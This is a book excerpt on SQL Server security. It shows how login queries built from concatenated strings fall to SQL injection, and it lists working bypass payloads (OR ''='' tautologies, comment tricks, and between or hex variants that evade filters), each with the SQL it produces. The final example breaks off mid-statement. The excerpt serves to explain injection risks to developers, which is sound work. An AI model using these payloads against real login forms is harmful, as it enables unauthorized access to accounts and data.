||SQL Server Tips by Gama and Naughter
Other Security Considerations
There are many other ways to disrupt the code, the previous example
could be prevented by filtering "--" but there are more
The AND condition requires that both operands are true and one way
to force that to happen is to add an OR to both inputs, followed by
an empty string and an equal sign. This will result in ''='', which
is true and the OR will be true because one operand is already true.
' OR ''=' ' OR ''='
SELECT username from Table_users WHERE logname='' OR ''='' AND
userpassword='' OR ''=''
The multiline comment /* */ is legal between TSQL code and it can
turn part of the logic into a comment. The log name could take any
value because the password would be ignored and an OR operator with
a true operand would force the result to be true.
'/* */ OR ''='
SELECT username from Table_users WHERE logname=''/*' AND
userpassword='*/ OR ''=''
If the equal sign is filtered, other ones can be used:
' OR ''<'1 ' OR ''<'1
SELECT username from Table_users WHERE logname='' OR ''<'1' AND
userpassword='' OR ''<'1'
If =, <, > are filtered, there is still the between command:
' OR '' between '' AND ' ' OR ''
between '' AND '
SELECT username from Table_users WHERE logname='' OR '' between ''
AND '' AND userpassword='' OR '' between '' AND ''
If the filter removes empty strings or rejects input with more than
two single quotes, it is still possible to insert a string by using
its hexadecimal representation:
' OR 0x00<'abc ' OR 0x00<'abc
SELECT username from Table_users WHERE logname='' OR 0x00<'abc' AND
userpassword='' OR 0x00<'abc'
Another approach is to try guessing the column names and turn the
string delimiters into empty strings:
SELECT username from Table_users WHERE logname=''+logname+'' AND
The above book excerpt is from:
Turbocharge Database Performance with C++ External Procedures
Joseph Gama, P. J. Naughter